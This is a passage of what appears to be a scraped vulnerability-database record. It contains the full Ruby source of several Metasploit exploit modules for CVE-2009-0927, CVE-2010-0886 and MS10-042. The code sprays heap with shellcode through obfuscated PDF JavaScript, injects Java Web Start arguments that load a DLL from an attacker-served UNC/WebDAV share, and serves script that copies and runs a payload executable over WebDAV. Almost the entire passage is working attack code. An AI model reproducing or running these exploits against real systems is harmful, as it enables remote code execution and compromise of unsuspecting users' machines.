src=\"hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E\">\nEOS\n\n rand_vbs\t= rand_text_alpha(rand(2)+1) + \".vbs\"\n copy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\\\#{@payload}^\n vbs_content = %Q|WScript.CreateObject(\"WScript.Shell\").Run \"#{copy_launch}\",0,false|\n write_vbs\t= %Q|cmd /c echo #{vbs_content}>%TEMP%\\\\#{rand_vbs}|\n launch_vbs = %Q|cscript %TEMP%\\\\#{rand_vbs}>nul|\n concat_cmds = \"#{write_vbs}|#{launch_vbs}\"\n\n eval_block = \"Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));\"\n eval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block))\n help_html.gsub!(/COMMANDS/, eval_block)\n print_status(\"Sending exploit trigger\")\n send_response(cli, help_html, { 'Content-Type' => 'text/html' })\n return\n end\n\n # default initial response\n js = %Q|\nvar asx = \"URLBASE/ASXFILE\";\nvar ifr = \"URLBASE/IFRFILE\";\n\nfunction launchiframe(src) {\n var o = document.createElement(\"IFRAME\");\n o.setAttribute(\"width\",\"0\");\n o.setAttribute(\"height\",\"0\");\n o.setAttribute(\"frameborder\",\"0\");\n o.setAttribute(\"src\",src);\n document.body.appendChild(o);\n}\n\nif (window.navigator.appName == \"Microsoft Internet Explorer\") {\n var ua = window.navigator.userAgent;\n var re = new RegExp(\"MSIE ([0-9]{1,}[\\.0-9]{0,})\");\n re.exec(ua)\n ver = parseFloat( RegExp.$1 );\n\n // if ie8, check WMP version\n if (ver > 7) {\n var o = document.createElement(\"OBJECT\");\n o.setAttribute(\"classid\", \"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6\");\n o.setAttribute(\"uiMode\", \"invisible\");\n // if wmp9, go ahead and launch\n if( parseInt(o.versionInfo) < 10 ) {\n o.openPlayer(asx);\n // if > wmp9, only launch if user requests\n } else {\n DIALOGMECH\n }\n // if ie7, use iframe\n } else {\n launchiframe(ifr);\n }\n} else {\n // if other, try iframe\n launchiframe(ifr);\n}\n|\n\n html = %Q|<html>\n<head></head><body><script>JAVASCRIPTFU\n</script>\n</body>\n</html>\n|\n case datastore['DIALOGMECH']\n when \"player\"\n mech = \"o.openPlayer(asx);\"\n when \"iframe\"\n mech = \"launchiframe(ifr);\"\n when \"none\"\n mech = \"\"\n else\n mech = \"\"\n end\n\n html.gsub!(/JAVASCRIPTFU/, js)\n html.gsub!(/DIALOGMECH/, mech)\n html.gsub!(/URLBASE/, @url_base)\n html.gsub!(/ASXFILE/, @random_dir + \"/\" + @asx_file)\n html.gsub!(/IFRFILE/, @random_dir + \"/\" + @start_help)\n\n print_status(\"Sending #{self.name}\")\n\n headers = {\n 'Content-Type'\t\t=> 'text/html',\n #'X-UA-Compatible'\t=> 'IE=7'\n }\n\n send_response(cli, html, headers)\n end\n\n #\n # OPTIONS requests sent by the WebDav Mini-Redirector\n #\n def process_options(cli, request)\n print_status(\"Responding to WebDAV OPTIONS request\")\n headers = {\n #'DASL' => '<DAV:sql>',\n #'DAV' => '1, 2',\n 'Allow' => 'OPTIONS, GET, PROPFIND',\n 'Public' => 'OPTIONS, GET, PROPFIND'\n }\n send_response(cli, '', headers)\n end\n\n def convert_to_char_code(str)\n return str.unpack('H*')[0].gsub(Regexp.new(\".{#{2}}\", nil, 'n')) { |s| s.hex.to_s + \",\" }.chop\n end\n #\n # PROPFIND requests sent by the WebDav Mini-Redirector\n #\n def process_propfind(cli, request)\n path = request.uri\n print_status(\"Received WebDAV PROPFIND request\")\n body = ''\n\n if (Regexp.new(Regexp.escape(@payload)+'$', true).match(path))\n # Response for the EXE\n print_status(\"Sending EXE multistatus for #{path} ...\")\n#<lp1:getcontentlength>45056</lp1:getcontentlength>\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag>\n<lp2:executable>F</lp2:executable>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n elsif (path =~ /\\.manifest$/i) or (path =~ /\\.config$/i) or (path =~ /\\.exe/i)\n print_status(\"Sending 404 for #{path} ...\")\n send_not_found(cli)\n return\n\n elsif (path =~ /\\/$/) or (not path.sub('/', '').index('/'))\n # Response for anything else (generally just /)\n print_status(\"Sending directory multistatus for #{path} ...\")\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag>\n<D:lockdiscovery/>\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n\n else\n print_status(\"Sending 404 for #{path} ...\")\n send_not_found(cli)\n return\n end\n\n # send the response\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml'\n cli.send_response(resp)\n end\n\n def exploit\n @random_dir = rand_text_alpha(rand(2)+1)\n @asx_file\t= rand_text_alpha(rand(2)+1) + \".asx\"\n @start_help\t= rand_text_alpha(rand(2)+1) + \".html\"\n @payload\t= rand_text_alpha(rand(2)+1) + \".exe\"\n @img_file\t= rand_text_alpha(rand(2)+1) + \".gif\"\n\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\n end\n\n super\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb"}, {"lastseen": "2020-10-06T03:16:24", "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Adobe Collab.getIcon() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_GETICON", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/pdf'\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::PDF\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'MC',\n 'Didier Stevens <didier.stevens[at]gmail.com>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2009-0927' ],\n [ 'OSVDB', '53647' ],\n [ 'ZDI', '09-014' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => true\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # test results (on Windows XP SP3)\n # reader 7.0.5 - no trigger\n # reader 7.0.8 - no trigger\n # reader 7.0.9 - no trigger\n # reader 7.1.0 - no trigger\n # reader 7.1.1 - reported not vulnerable\n # reader 8.0.0 - works\n # reader 8.1.2 - works\n # reader 8.1.3 - reported not vulnerable\n # reader 9.0.0 - works\n # reader 9.1.0 - reported not vulnerable\n [ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],\n ],\n 'DisclosureDate' => 'Mar 24 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Make some nops\n nops = Rex::Text.to_unescape(make_nops(4))\n\n # Randomize variables\n rand1 = rand_text_alpha(rand(100) + 1)\n rand2 = rand_text_alpha(rand(100) + 1)\n rand3 = rand_text_alpha(rand(100) + 1)\n rand4 = rand_text_alpha(rand(100) + 1)\n rand5 = rand_text_alpha(rand(100) + 1)\n rand6 = rand_text_alpha(rand(100) + 1)\n rand7 = rand_text_alpha(rand(100) + 1)\n rand8 = rand_text_alpha(rand(100) + 1)\n rand9 = rand_text_alpha(rand(100) + 1)\n rand10 = rand_text_alpha(rand(100) + 1)\n rand11 = rand_text_alpha(rand(100) + 1)\n rand12 = rand_text_alpha(rand(100) + 1)\n\n script = %Q|\n var #{rand1} = unescape(\"#{shellcode}\");\n var #{rand2} =\"\";\n for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\");\n #{rand4} = #{rand2} + #{rand1};\n #{rand5} = unescape(\"#{nops}\");\n #{rand6} = 20;\n #{rand7} = #{rand6}+#{rand4}.length\n while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\n #{rand8} = #{rand5}.substring(0, #{rand7});\n #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\n while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\n #{rand10} = new Array();\n for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\n var #{rand12} = unescape(\"%0a\");\n while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\n #{rand12} = \"N.\"+#{rand12};\n Collab.getIcon(#{rand12});\n |\n\n # Create the pdf\n #pdf = make_pdf(script)\n pdf = create_pdf(script)\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(pdf)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_geticon.rb"}, {"lastseen": "2020-07-24T20:22:13", "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.\n", "published": "2009-03-28T07:40:29", "type": "metasploit", "title": "Adobe Collab.getIcon() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2017-10-05T21:44:36", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_GETICON", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'MC',\n 'Didier Stevens <didier.stevens[at]gmail.com>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2009-0927' ],\n [ 'OSVDB', '53647' ],\n [ 'ZDI', '09-014' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-04.html']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # test results (on Windows XP SP3)\n # reader 7.0.5 - no trigger\n # reader 7.0.8 - no trigger\n # reader 7.0.9 - no trigger\n # reader 7.1.0 - no trigger\n # reader 7.1.1 - reported not vulnerable\n # reader 8.0.0 - works\n # reader 8.1.2 - works\n # reader 8.1.3 - reported not vulnerable\n # reader 9.0.0 - works\n # reader 9.1.0 - reported not vulnerable\n [ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],\n ],\n 'DisclosureDate' => 'Mar 24 2009',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n return if ((p = regenerate_payload(cli)) == nil)\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Make some nops\n nops = Rex::Text.to_unescape(make_nops(4))\n\n # Randomize variables\n rand1 = rand_text_alpha(rand(100) + 1)\n rand2 = rand_text_alpha(rand(100) + 1)\n rand3 = rand_text_alpha(rand(100) + 1)\n rand4 = rand_text_alpha(rand(100) + 1)\n rand5 = rand_text_alpha(rand(100) + 1)\n rand6 = rand_text_alpha(rand(100) + 1)\n rand7 = rand_text_alpha(rand(100) + 1)\n rand8 = rand_text_alpha(rand(100) + 1)\n rand9 = rand_text_alpha(rand(100) + 1)\n rand10 = rand_text_alpha(rand(100) + 1)\n rand11 = rand_text_alpha(rand(100) + 1)\n rand12 = rand_text_alpha(rand(100) + 1)\n randnop = rand_text_alpha(rand(100) + 1)\n\n script = %Q|\n var #{rand1} = unescape(\"#{shellcode}\");\n var #{rand2} =\"\";\n var #{randnop} = \"#{nops}\";\n for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{randnop}\");\n #{rand4} = #{rand2} + #{rand1};\n #{rand5} = unescape(#{randnop});\n #{rand6} = 20;\n #{rand7} = #{rand6}+#{rand4}.length\n while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\n #{rand8} = #{rand5}.substring(0, #{rand7});\n #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\n while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\n #{rand10} = new Array();\n for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\n var #{rand12} = unescape(\"%0a\");\n while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\n #{rand12} = \"N.\"+#{rand12};\n Collab.getIcon(#{rand12});\n |\n\n # Create the pdf\n pdf = make_pdf(script)\n\n print_status(\"Sending #{self.name}\")\n\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })\n\n handler(cli)\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n def make_pdf(js)\n\n xref = []\n eol = \"\\x0d\\x0a\"\n endobj = \"endobj\" << eol\n\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<</Type/Catalog/Outlines \") << io_ref(2) << n_obfu(\"/Pages \") << io_ref(3) << n_obfu(\"/OpenAction \") << io_ref(5) << \">>\" << endobj\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<</Type/Outlines/Count 0>>\") << endobj\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<</Type/Pages/Kids[\") << io_ref(4) << n_obfu(\"]/Count 1>>\") << endobj\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<</Type/Page/Parent \") << io_ref(3) << n_obfu(\"/MediaBox[0 0 612 792]>>\") << endobj\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<</Type/Action/S/JavaScript/JS \") + io_ref(6) + \">>\" << endobj\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(6) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n pdf << \"trailer\" << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n pdf << \"%%EOF\" << eol\n\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_geticon.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T21:47:59", "description": "This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 \"are believed to be affected by this vulnerability.\" In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n", "published": "2010-04-16T08:08:40", "type": "metasploit", "title": "Sun Java Web Start Plugin Command Line Argument Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0886", "CVE-2010-1423"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/JAVA_WS_ARGINJECT_ALTJVM", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n #\n # This module acts as an HTTP server\n #\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Sun Java Web Start Plugin Command Line Argument Injection',\n 'Description' => %q{\n This module exploits a flaw in the Web Start plugin component of Sun Java\n Web Start. The arguments passed to Java Web Start are not properly validated.\n By passing the lesser known -J option, an attacker can pass arbitrary options\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\n an unsuspecting browser user.\n\n This vulnerability was originally discovered independently by both Ruben\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n In order for this module to work, it must be ran as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.\n },\n 'License' => MSF_LICENSE,\n 'Author' => 'jduck',\n 'References' =>\n [\n [ 'CVE', '2010-0886' ],\n [ 'CVE', '2010-1423' ],\n [ 'OSVDB', '63648' ],\n [ 'BID', '39346' ],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html' ],\n [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1' ]\n ],\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => '',\n 'DisableNops' => true,\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\"\n },\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'Java Runtime on Windows x86',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 09 2010'\n ))\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The daemon port to listen on\", 80 ]),\n OptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ]),\n OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ])\n ])\n end\n\n\n def auto_target(cli, request)\n agent = request.headers['User-Agent']\n\n ret = nil\n #print_status(\"Agent: #{agent}\")\n # Check for MSIE and/or WebDAV redirector requests\n if agent =~ /(Windows NT (5|6)\\.(0|1|2)|MiniRedir\\/(5|6)\\.(0|1|2))/\n ret = targets[1]\n elsif agent =~ /MSIE (6|7|8)\\.0/\n ret = targets[1]\n else\n print_status(\"Unknown User-Agent #{agent}\")\n end\n\n ret\n end\n\n\n def on_request_uri(cli, request)\n\n # For this exploit, this does little besides ensures the user agent is a recognized one..\n mytarget = target\n if target.name == 'Automatic'\n mytarget = auto_target(cli, request)\n if (not mytarget)\n send_not_found(cli)\n return\n end\n end\n\n # Special case to process OPTIONS for /\n if (request.method == 'OPTIONS' and request.uri == '/')\n process_options(cli, request, mytarget)\n return\n end\n\n # Discard requests for ico files\n if (request.uri =~ /\\.ico$/i)\n send_not_found(cli)\n return\n end\n\n # If there is no subdirectory in the request, we need to redirect.\n if (request.uri == '/') or not (request.uri =~ /\\/([^\\/]+)\\//)\n if (request.uri == '/')\n subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'\n else\n subdir = request.uri + '/'\n end\n print_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\")\n send_redirect(cli, subdir)\n return\n else\n share_name = $1\n end\n\n # dispatch WebDAV requests based on method first\n case request.method\n when 'OPTIONS'\n process_options(cli, request, mytarget)\n\n when 'PROPFIND'\n process_propfind(cli, request, mytarget)\n\n when 'GET'\n process_get(cli, request, mytarget, share_name)\n\n when 'PUT'\n print_status(\"Sending 404 for PUT #{request.uri} ...\")\n send_not_found(cli)\n\n else\n print_error(\"Unexpected request method encountered: #{request.method}\")\n\n end\n\n end\n\n #\n # GET requests\n #\n def process_get(cli, request, target, share_name)\n\n print_status(\"Responding to \\\"GET #{request.uri}\\\" request\")\n # dispatch based on extension\n if (request.uri =~ /\\.dll$/i)\n #\n # DLL requests sent by IE and the WebDav Mini-Redirector\n #\n print_status(\"Sending DLL\")\n\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Generate a DLL based on the payload\n dll_data = generate_payload_dll({ :code => p.encoded })\n\n # Send it :)\n send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })\n\n else\n #\n # HTML requests sent by IE and Firefox\n #\n # This could probably use the Host header from the request\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n\n # Always prepare the UNC path, even if we dont use it for this request...\n if (datastore['UNCPATH'])\n unc = datastore['UNCPATH'].dup\n else\n unc = \"\\\\\\\\\" + my_host + \"\\\\\" + share_name\n end\n jnlp = \"-J-XXaltjvm=\" + unc + \" -Xnosplash \" + rand_text_alphanumeric(8+rand(8)) + \".jnlp\"\n docbase = rand_text_alphanumeric(8+rand(8))\n\n # Provide the corresponding HTML page...\n if (request.uri =~ /\\.shtml/i)\n print_status(\"Sending JS version HTML\")\n # Javascript version...\n var_str = rand_text_alpha(8+rand(8))\n var_obj = rand_text_alpha(8+rand(8))\n var_obj2 = rand_text_alpha(8+rand(8))\n var_obj3 = rand_text_alpha(8+rand(8))\n js_jnlp = \"http: \"\n js_jnlp << jnlp.dup.gsub(\"\\\\\", \"\\\\\\\\\\\\\\\\\") # jeez\n\n # The 8ad.. CLSID doesn't support the launch method ...\n #clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'\n clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'\n html = %Q|<html>\n<body>Please wait...\n<script language=\"javascript\">\nvar #{var_str} = \"#{js_jnlp}\";\nif (window.navigator.appName == \"Microsoft Internet Explorer\") {\nvar #{var_obj} = document.createElement(\"OBJECT\");\n#{var_obj}.classid = \"clsid:#{clsid}\";\n#{var_obj}.launch(#{var_str});\n} else {\ntry {\nvar #{var_obj2} = document.createElement(\"OBJECT\");\n#{var_obj2}.type = \"application/npruntime-scriptable-plugin;deploymenttoolkit\";\ndocument.body.appendChild(#{var_obj2});\n#{var_obj2}.launch(#{var_str});\n} catch (e) {\nvar #{var_obj3} = document.createElement(\"OBJECT\");\n#{var_obj3}.type = \"application/java-deployment-toolkit\";\ndocument.body.appendChild(#{var_obj3});\n#{var_obj3}.launch(#{var_str});\n}\n}\n</script>\n</body>\n</html>\n|\n elsif (request.uri =~ /\\.htm/i)\n print_status(\"Sending non-JS version HTML\")\n clsids = [ '8AD9C840-044E-11D1-B3E9-00805F499D93', 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' ]\n clsid = clsids[rand(clsids.length)]\n html = %Q|<html>\n<body>Please wait...\n<object id=\"#{var_obj}\" classid=\"clsid:#{clsid}\"\nwidth=\"0\" height=\"0\">\n<PARAM name=\"launchjnlp\" value=\"#{jnlp}\">\n<PARAM name=\"docbase\" value=\"#{docbase}\">\n</object>\n<embed type=\"application/x-java-applet\"\nwidth=\"0\" height=\"0\"\nlaunchjnlp=\"#{jnlp}\"\ndocbase=\"#{docbase}\"\n/>\n</body>\n</html>\n|\n else\n print_status(\"Sending js detection HTML\")\n\n # NOTE: The JS version is preferred to the HTML version since it works on more JRE versions\n js_uri = rand_text_alphanumeric(8+rand(8)) + \".shtml\"\n no_js_uri = rand_text_alphanumeric(8+rand(8)) + \".htm\"\n\n html = %Q|<html>\n<head>\n<meta http-equiv=\"refresh\" content=\"2;#{no_js_uri}\" />\n</head>\n<body>\nPlease wait...\n<script language=\"javascript\">\ndocument.location = \"#{js_uri}\";\n</script>\n</body>\n</html>\n|\n # end of detection html\n end\n\n send_response_html(cli, html,\n {\n 'Content-Type' => 'text/html',\n 'Pragma' => 'no-cache'\n })\n end\n\n end\n\n #\n # OPTIONS requests sent by the WebDav Mini-Redirector\n #\n def process_options(cli, request, target)\n print_status(\"Responding to WebDAV \\\"OPTIONS #{request.uri}\\\" request\")\n headers = {\n #'DASL' => '<DAV:sql>',\n #'DAV' => '1, 2',\n 'Allow' => 'OPTIONS, GET, PROPFIND',\n 'Public' => 'OPTIONS, GET, PROPFIND'\n }\n send_response(cli, '', headers)\n end\n\n\n #\n # PROPFIND requests sent by the WebDav Mini-Redirector\n #\n def process_propfind(cli, request, target)\n path = request.uri\n print_status(\"Received WebDAV \\\"PROPFIND #{request.uri}\\\" request\")\n body = ''\n\n if (path =~ /\\.dll$/i)\n # Response for the DLL\n print_status(\"Sending DLL multistatus for #{path} ...\")\n#<lp1:getcontentlength>45056</lp1:getcontentlength>\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus 